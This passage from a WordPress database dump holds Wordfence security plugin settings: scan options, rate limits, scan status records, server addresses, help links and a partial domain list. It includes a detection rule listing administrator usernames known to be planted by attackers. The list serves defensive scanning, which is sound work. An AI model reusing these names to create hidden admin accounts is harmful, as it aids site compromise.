Z��`�|W����A;��=]Л�z�,�~�_R\r��`�F�]�Q}r�p`<�=�۹`�c$L�5�i%\'a��50c�\'�N��yf`��1Xt����:eX��\0���]����y��m�-=v���`�k���0�e,P+G�����,}4\n����n�u\\���*�e�n1�_<��﯁��R�^�`����t�Y�|����d�;i�C�}��g�F}?�=6���&���q:l�U��D�6u��Nm�9��>����q�aot*x�B D\'B�o@H����*84J�L����p�D�g?9eD;�A�_eS}b�,�ؽ��\rq�VB��E�wU���8b$N2�$�H�Rgg���P#87k=��}.��Az�\\H_<2�l�Kw��2o��~\\��\nWՕ���pͰnV�@��T�;�����p�3�7�Id���c.�=}��\n��BQX)<�M�G\njP|�<<q_�����=�y���TCx�\'\Z�;~��I�b�p�\\�\0UGW��_�+\'x}��F�@�Q&����4j�B��h��_��@���p����2�M2|w���:[�O�w�s��|z�3��*`�v���֚aOY�J�\n�tB\r{�.�>Nި|�\ZU~t�/;΢��8`�\'���/�A���q!v�����Q{P#�7��W����hp���Ge����q��8Ƭ��tG�KG��J>�kU�	/\"pb�\Z/Vt�)���$�M��I�6N���iW4p�h\r��Q4�[����,`�Q��9C��Wh~�Z\\�-���)Z^|��izh�2���F�2�*�C;�l�/:���p�K9.�\r��U�!��i�=tz:W�MD�wQ�\Z�=\\��G���8=ߏC�/�Kw5z�rB��V\\�7�L\n�5���?{�g��M�Cߜz�߃~���I�1@�?nL��@�+�9�n�x�[�bq�_w���p�5{��o�{����m^���4�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|��	��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo�	�=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\	tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x	����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#��	c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S؅�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��)	_+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X-	+NH⑋�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�޺ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','1','yes'),('needsNewTour_dashboard','1','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','1','yes'),('needsNewTour_scan','1','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:2:{i:0;i:1631683800;i:1;i:1631943000;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','','no'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1631424600','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1631615032.3149','yes'),('scanType','standard','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','1','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1631553025;300;51.195.195.160','yes'),('serverIP','1631424628;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1631224477','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blocklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','861fa35ee92ea792bee38ef73e0d7326fc59d39ea2f0acfe3a0b998811dfbf3c','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1631615023','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|akdn|ally|amex|arab|arpa|alstom|army|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|aetna|book|buzz|cafe|call|camp|cars|casa|case|cash|actor|care|adult|cbre|cern|chat|citi|city|club|cool|cymru|alsace|cyou|cards|coop|data|date|dclk|link|live|loan|loft|mini|mint|amfam|chase|cisco|mobi|apple|limo|amica|like|archi|cheap|citic|click|life|codes|crown|deal|dell|game|lidl|love|cloud|coach|ltda|luxe|maif|meme|media|meet|menu|miami|moda|news|next|lotte|lotto|moto|name|navy|boats|nexus|alfaromeo|nico|nike|open|nikon|ninja|page|deals|nokia|ollo|alibaba|pars|bosch|airbus|nowtv|pccw|pink|play|plus|beats|bible|bingo|delta|airtel|baidu|black|lilly|linde|movie|ping|lipsy|money|pics|lixil|loans|locus|pohl|alipay|prod|prof|qpon|raid|read|dabur|dance|pizza|porn|post|phone|photo|place|poker|praxi|press|prime|promo|shia|audio|autos|azure|build|osaka|paris|parts|party|quest|radio|allstate|omega|allfinanz|canon|mango|vana|shoes|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|skype|sling|smart|smile|solar|space|spot|star|sport|stada|store|study|style|surf|talk|sucks|swiss|tatar|taxi|team|teva|tiaa|tips|tires|tirol|tmall|today|tokyo|tools|abarth|abbott|tech|toray|video|abbvie|agency|total|tours|town|toys|trade|vegas|africa|trust|tube|tunes|tushu|ubank|amazon|duck|audible|avianca|brother|dvag|broker|academy|camera|coffee|auspost|channel|dish|author|clinic|docs|earth|anquan|aramco|career|casino|center|chanel|email|boston|edeka|chrome|church|circle|claims|banamex|abudhabi|auction|bananarepublic|comsec|bugatti|accountants|condos|fage|careers|desi|caravan|diet|capital|erni|coupon|dubai|epson|cruise|dunlop|dupont|durban|emerck|expert|accenture|associates|estate|events|attorney|credit|athleta|energy|accountant|dentist|fail|fans|fiat|beauty|fast|fish|florist|food|ferrero|fire|flir|dental|farm|fido|film|ford|frogans|fujitsu|ggee|final|finance|free|fund|gbiz|gent|gift|bayern|bentley|flowers|gmbh|ferrari|gallery|gallo|games|goog|bestbuy|guge|bharti|faith|gold|golf|guru|hair|gifts|futbol|haus|berlin|family|farmers|fashion|hdfc|fedex|design|help|here|hgtv|gives|horse|barclays|forex|green|gripe|barclaycard|gmail|barcelona|gucci|flickr|flights|globo|group|guide|host|honda|hsbc|bostik|drive|glade|glass|homes|hyatt|icbc|forum|booking|immo|yoga|house|ieee|ikano|imdb|lgbt|work|abogado|works|world|doctor|xerox|basketball|zara|zero|bauhaus|dating|datsun|dealer|degree|yahoo|direct|fishing|xbox|fitness|bargains|baseball|education|zone|barefoot|forsale|gallup|kiwi|contact|kddi|land|visa|koeln|google|jprs|kaufen|kinder|kindle|kosher|kpmg|kred|lego|luxury|madrid|maison|makeup|market|mattel|monash|stream|studio|supply|suzuki|swatch|sydney|taipei|grocery|unicom|android|tattoo|compare|target|company|taobao|viva|vivo|gratis|lexus|volvo|garden|global|legal|voto|lease|vote|george|giving|kyoto|corsica|juegos|lamer|lefrak|london|vodka|shouji|coupons|viajes|viking|villas|vision|voting|voyage|country|courses|lancia|latino|lawyer|living|locker|mobile|soccer|social|tennis|virgin|wine|zappos|agakhan|charity|college|cologne|comcast|airforce|chintai|citadel|clubmed|cooking|cruises|digital|domains|exposed|express|genting|godaddy|americanexpress|americanfamily|cricket|guitars|hermes|itau|hiphop|hitachi|irish|watch|weber|hockey|holiday|hotels|hughes|info|jaguar|java|nissan|nissay|oracle|pfizer|photos|physio|pictet|webcam|weibo|hamburg|hosting|afamilycompany|intuit|wiki|health|wien|imamat|insure|mormon|weir|hangout|norton|nowruz|office|olayan|online|orange|otsuka|toyota|travel|hoteles|jeep|jetzt|monster|amsterdam|juniper|lanxess|lasalle|latrobe|analytics|hyundai|jobs|leclerc|limited|lincoln|apartments|joburg|moscow|wales|museum|racing|tienda|xihuan|yandex|hotmail|ismaili|aquarelle|quebec|wang|nagoya|jewelry|natura|kitchen|mutual|markets|netflix|network|oldnavy|philips|tjmaxx|komatsu|okinawa|politie|tkmaxx|yachts|netbank|pioneer|walter|lacaixa|organic|origins|vuelos|neustar|realtor|shell|boutique|bradesco|broadway|budapest|builders|business|capetown|catering|walmart|catholic|christmas|cipriani|computer|capitalone|shiksha|wanggou|cityeats|cleaning|clinique|clothing|commbank|democrat|diamonds|discount|community|discover|download|engineer|calvinklein|directory|engineering|enterprises|ericsson|equipment|construction|delivery|deloitte|consulting|creditcard|cuisinella|contractors|creditunion|cookingchannel|theatre|tickets|toshiba|trading|watches|cancerresearch|tiffany|weather|brussels|windows|winners|xfinity|yamaxun|youtube|zuerich|etisalat|whoswho|exchange|wedding|feedback|frontier|goodyear|website|fidelity|firmdale|grainger|graphics|guardian|firestone|football|frontdoor|furniture|hdfcbank|goldpoint|foundation|fresenius|foodnetwork|helsinki|eurovision|extraspace|fairwinds|healthcare|holdings|financial|ipiranga|homedepot|homegoods|homesense|hospital|insurance|immobilien|industries|infiniti|hisamitsu|institute|investments|international|istanbul|macys|rmit|bnpparibas|rent|bloom